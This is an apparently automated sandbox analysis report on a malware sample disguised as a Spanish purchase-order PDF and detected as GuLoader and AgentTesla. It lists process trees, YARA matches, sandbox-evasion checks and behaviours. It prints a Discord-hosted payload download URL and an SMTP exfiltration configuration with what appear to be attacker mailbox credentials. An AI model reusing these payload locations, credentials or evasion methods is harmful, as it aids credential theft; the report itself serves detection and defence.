Edit tour

Windows Analysis Report
ORDEN DE COMPRA 80107.pdf________________________.exe

Overview

General Information

Sample Name:	ORDEN DE COMPRA 80107.pdf________________________.exe
Analysis ID:	558805
MD5:	af7c27fd6e49538aa93a667d67463c51
SHA1:	e2da9a0143a07da2b2c498f4622ea5db21d9298f
SHA256:	d7553925a2f9d9840cd23da20f66fcbfb3e7eca2f24c624e2f6139181eefc138
Tags:	exe
Infos:

Detection

AgentTesla GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Yara detected AgentTesla

Yara detected GuLoader

Hides threads from debuggers

Initial sample is a PE file and has a suspicious name

Writes to foreign memory regions

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

C2 URLs / IPs found in malware configuration

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Yara detected Credential Stealer

JA3 SSL client fingerprint seen in connection with other malware

IP address seen in connection with other malware

Contains long sleeps (>= 3 min)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Sample file is different than original file name gathered from version info

Uses a known web browser user agent for HTTP communication

PE / OLE file has an invalid certificate

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

ORDEN DE COMPRA 80107.pdf________________________.exe (PID: 4600 cmdline: "C:\Users\user\Desktop\ORDEN DE COMPRA 80107.pdf________________________.exe" MD5: AF7C27FD6E49538AA93A667D67463C51)

CasPol.exe (PID: 5340 cmdline: "C:\Users\user\Desktop\ORDEN DE COMPRA 80107.pdf________________________.exe" MD5: F866FC1C2E928779C7119353C3091F0C)

CasPol.exe (PID: 4820 cmdline: "C:\Users\user\Desktop\ORDEN DE COMPRA 80107.pdf________________________.exe" MD5: F866FC1C2E928779C7119353C3091F0C)

CasPol.exe (PID: 5640 cmdline: "C:\Users\user\Desktop\ORDEN DE COMPRA 80107.pdf________________________.exe" MD5: F866FC1C2E928779C7119353C3091F0C)

conhost.exe (PID: 4568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://cdn.discordapp.com/attachments/934180388522299433/9350"}

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "kubaba@bhgautopartes.comicui4cu2@@mail.bhgautopartes.comkubabareports@bhgautopartes.com"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.366777936.000000000040D000.00000020.00000001.01000000.00000003.sdmp	LokiBot_Dropper_Packed_R11_Feb18	Auto-generated rule - file scan copy.pdf.r11	Florian Roth	0x26f8:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
00000000.00000000.289570164.000000000040D000.00000020.00000001.01000000.00000003.sdmp	LokiBot_Dropper_Packed_R11_Feb18	Auto-generated rule - file scan copy.pdf.r11	Florian Roth	0x26f8:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
00000007.00000000.335904974.0000000001300000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000007.00000002.567367145.000000001E271000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000007.00000002.567367145.000000001E271000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: CasPol.exe PID: 5640	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: CasPol.exe PID: 5640	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Click to see the 2 entries

HTTP traffic detected: GET /attachments/934180388522299433/935091672193314826/kubaba_yqzTpIrbd157.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: cdn.discordapp.comCache-Control: no-cache

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443

Source: CasPol.exe, 00000007.00000002.567367145.000000001E271000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: CasPol.exe, 00000007.00000002.567367145.000000001E271000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://DynDns.comDynDNS
Source: CasPol.exe, 00000007.00000002.567367145.000000001E271000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://JNREkg.com
Source: ORDEN DE COMPRA 80107.pdf________________________.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: ORDEN DE COMPRA 80107.pdf________________________.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: CasPol.exe, 00000007.00000003.361928759.0000000001629000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000007.00000003.362053804.0000000001629000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000007.00000002.558008011.0000000001620000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: ORDEN DE COMPRA 80107.pdf________________________.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: ORDEN DE COMPRA 80107.pdf________________________.exe	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: ORDEN DE COMPRA 80107.pdf________________________.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: ORDEN DE COMPRA 80107.pdf________________________.exe	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: ORDEN DE COMPRA 80107.pdf________________________.exe	String found in binary or memory: http://ocsp.digicert.com0C
Source: ORDEN DE COMPRA 80107.pdf________________________.exe	String found in binary or memory: http://ocsp.digicert.com0O
Source: ORDEN DE COMPRA 80107.pdf________________________.exe	String found in binary or memory: http://www.digicert.com/CPS0
Source: CasPol.exe, 00000007.00000002.558269317.00000000016B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/934180388522299433/935091672193314826/kubaba_yqzTpIrbd157.bin
Source: ORDEN DE COMPRA 80107.pdf________________________.exe	String found in binary or memory: https://www.digicert.com/CPS0
Source: CasPol.exe, 00000007.00000002.567367145.000000001E271000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

Source: unknown

DNS traffic detected: queries for: cdn.discordapp.com

Source: global traffic

Source: unknown

HTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.3:49750 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.366777936.000000000040D000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 00000000.00000000.289570164.000000000040D000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: ORDEN DE COMPRA 80107.pdf________________________.exe

Source: ORDEN DE COMPRA 80107.pdf________________________.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: 00000000.00000002.366777936.000000000040D000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000000.00000000.289570164.000000000040D000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE

Source: C:\Users\user\Desktop\ORDEN DE COMPRA 80107.pdf________________________.exe	Code function: 0_2_0041357E	0_2_0041357E
Source: C:\Users\user\Desktop\ORDEN DE COMPRA 80107.pdf________________________.exe	Code function: 0_2_004015B8	0_2_004015B8
Source: C:\Users\user\Desktop\ORDEN DE COMPRA 80107.pdf________________________.exe	Code function: 0_2_00413579	0_2_00413579
Source: C:\Users\user\Desktop\ORDEN DE COMPRA 80107.pdf________________________.exe	Code function: 0_2_0040192D	0_2_0040192D
Source: C:\Users\user\Desktop\ORDEN DE COMPRA 80107.pdf________________________.exe	Code function: 0_2_004071BA	0_2_004071BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_1E0646A0	7_2_1E0646A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_1E064690	7_2_1E064690

Source: ORDEN DE COMPRA 80107.pdf________________________.exe, 00000000.00000000.289596744.000000000042C000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameMousetail6.exe vs ORDEN DE COMPRA 80107.pdf________________________.exe
Source: ORDEN DE COMPRA 80107.pdf________________________.exe	Binary or memory string: OriginalFilenameMousetail6.exe vs ORDEN DE COMPRA 80107.pdf________________________.exe

Source: ORDEN DE COMPRA 80107.pdf________________________.exe

Static PE information: invalid certificate

Source: ORDEN DE COMPRA 80107.pdf________________________.exe	Virustotal: Detection: 17%
Source: ORDEN DE COMPRA 80107.pdf________________________.exe	ReversingLabs: Detection: 23%

Source: ORDEN DE COMPRA 80107.pdf________________________.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\ORDEN DE COMPRA 80107.pdf________________________.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\ORDEN DE COMPRA 80107.pdf________________________.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\ORDEN DE COMPRA 80107.pdf________________________.exe "C:\Users\user\Desktop\ORDEN DE COMPRA 80107.pdf________________________.exe"
Source: C:\Users\user\Desktop\ORDEN DE COMPRA 80107.pdf________________________.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\ORDEN DE COMPRA 80107.pdf________________________.exe"
Source: C:\Users\user\Desktop\ORDEN DE COMPRA 80107.pdf________________________.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\ORDEN DE COMPRA 80107.pdf________________________.exe"
Source: C:\Users\user\Desktop\ORDEN DE COMPRA 80107.pdf________________________.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\ORDEN DE COMPRA 80107.pdf________________________.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ORDEN DE COMPRA 80107.pdf________________________.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\ORDEN DE COMPRA 80107.pdf________________________.exe"	Jump to behavior
Source: C:\Users\user\Desktop\ORDEN DE COMPRA 80107.pdf________________________.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\ORDEN DE COMPRA 80107.pdf________________________.exe"	Jump to behavior
Source: C:\Users\user\Desktop\ORDEN DE COMPRA 80107.pdf________________________.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\ORDEN DE COMPRA 80107.pdf________________________.exe"	Jump to behavior

Source: C:\Users\user\Desktop\ORDEN DE COMPRA 80107.pdf________________________.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\InprocServer32

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Users\user\Desktop\ORDEN DE COMPRA 80107.pdf________________________.exe

File created: C:\Users\user\AppData\Roaming\yf6svhF8LWErfw4ZrCRuxOdYLn2c7qO224

Jump to behavior

Source: C:\Users\user\Desktop\ORDEN DE COMPRA 80107.pdf________________________.exe

File created: C:\Users\user\AppData\Local\Temp\~DF3DFDC0A18C6E3284.TMP

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@8/1@1/1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4568:120:WilError_01

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000007.00000000.335904974.0000000001300000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\ORDEN DE COMPRA 80107.pdf________________________.exe	Code function: 0_2_004158CA push cs; retf	0_2_004159B1
Source: C:\Users\user\Desktop\ORDEN DE COMPRA 80107.pdf________________________.exe	Code function: 0_2_00415482 push ebp; retf	0_2_00415489
Source: C:\Users\user\Desktop\ORDEN DE COMPRA 80107.pdf________________________.exe	Code function: 0_2_00415921 push cs; retf	0_2_004159B1
Source: C:\Users\user\Desktop\ORDEN DE COMPRA 80107.pdf________________________.exe	Code function: 0_2_02C01ED4 push ds; ret	0_2_02C01ED5
Source: C:\Users\user\Desktop\ORDEN DE COMPRA 80107.pdf________________________.exe	Code function: 0_2_02C046AE push 00000041h; ret	0_2_02C046C3
Source: C:\Users\user\Desktop\ORDEN DE COMPRA 80107.pdf________________________.exe	Code function: 0_2_02C0345D push edx; retf	0_2_02C0345E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 7_2_1E067751 push ds; ret	7_2_1E067760

Source: C:\Users\user\Desktop\ORDEN DE COMPRA 80107.pdf________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDEN DE COMPRA 80107.pdf________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDEN DE COMPRA 80107.pdf________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect Any.run

Source: C:\Users\user\Desktop\ORDEN DE COMPRA 80107.pdf________________________.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\ORDEN DE COMPRA 80107.pdf________________________.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: ORDEN DE COMPRA 80107.pdf________________________.exe, 00000000.00000002.367081613.0000000003280000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32APPDATA=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXE\SYSWOW64\MSHTML.TLBWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXE\SYSWOW64\MSHTML.TLBWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXE\SYSWOW64\MSHTML.TLB
Source: ORDEN DE COMPRA 80107.pdf________________________.exe, 00000000.00000002.367081613.0000000003280000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000007.00000002.558269317.00000000016B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: CasPol.exe, 00000007.00000002.558269317.00000000016B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32APPDATA=HTTPS://CDN.DISCORDAPP.COM/ATTACHMENTS/934180388522299433/935091672193314826/KUBABA_YQZTPIRBD157.BIN

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 4344

Thread sleep time: -14757395258967632s >= -30000s

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Window / User API: threadDelayed 3066			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Window / User API: threadDelayed 6745			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\ORDEN DE COMPRA 80107.pdf________________________.exe

System information queried: ModuleInformation

Jump to behavior

Source: ORDEN DE COMPRA 80107.pdf________________________.exe, 00000000.00000002.367097573.000000000334A000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000007.00000002.558387365.000000000311A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: ORDEN DE COMPRA 80107.pdf________________________.exe, 00000000.00000002.367081613.0000000003280000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32APPDATA=windir=\Microsoft.NET\Framework\v4.0.30319\caspol.exe\syswow64\mshtml.tlbwindir=\Microsoft.NET\Framework\v4.0.30319\caspol.exe\syswow64\mshtml.tlbwindir=\Microsoft.NET\Framework\v4.0.30319\caspol.exe\syswow64\mshtml.tlb
Source: ORDEN DE COMPRA 80107.pdf________________________.exe, 00000000.00000002.367097573.000000000334A000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000007.00000002.558387365.000000000311A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: CasPol.exe, 00000007.00000002.558387365.000000000311A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicshutdown
Source: ORDEN DE COMPRA 80107.pdf________________________.exe, 00000000.00000002.367097573.000000000334A000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000007.00000002.558387365.000000000311A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: ORDEN DE COMPRA 80107.pdf________________________.exe, 00000000.00000002.367097573.000000000334A000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000007.00000002.558387365.000000000311A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: ORDEN DE COMPRA 80107.pdf________________________.exe, 00000000.00000002.367097573.000000000334A000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000007.00000002.558387365.000000000311A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: CasPol.exe, 00000007.00000002.558387365.000000000311A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicvss
Source: CasPol.exe, 00000007.00000002.557982348.0000000001611000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWe
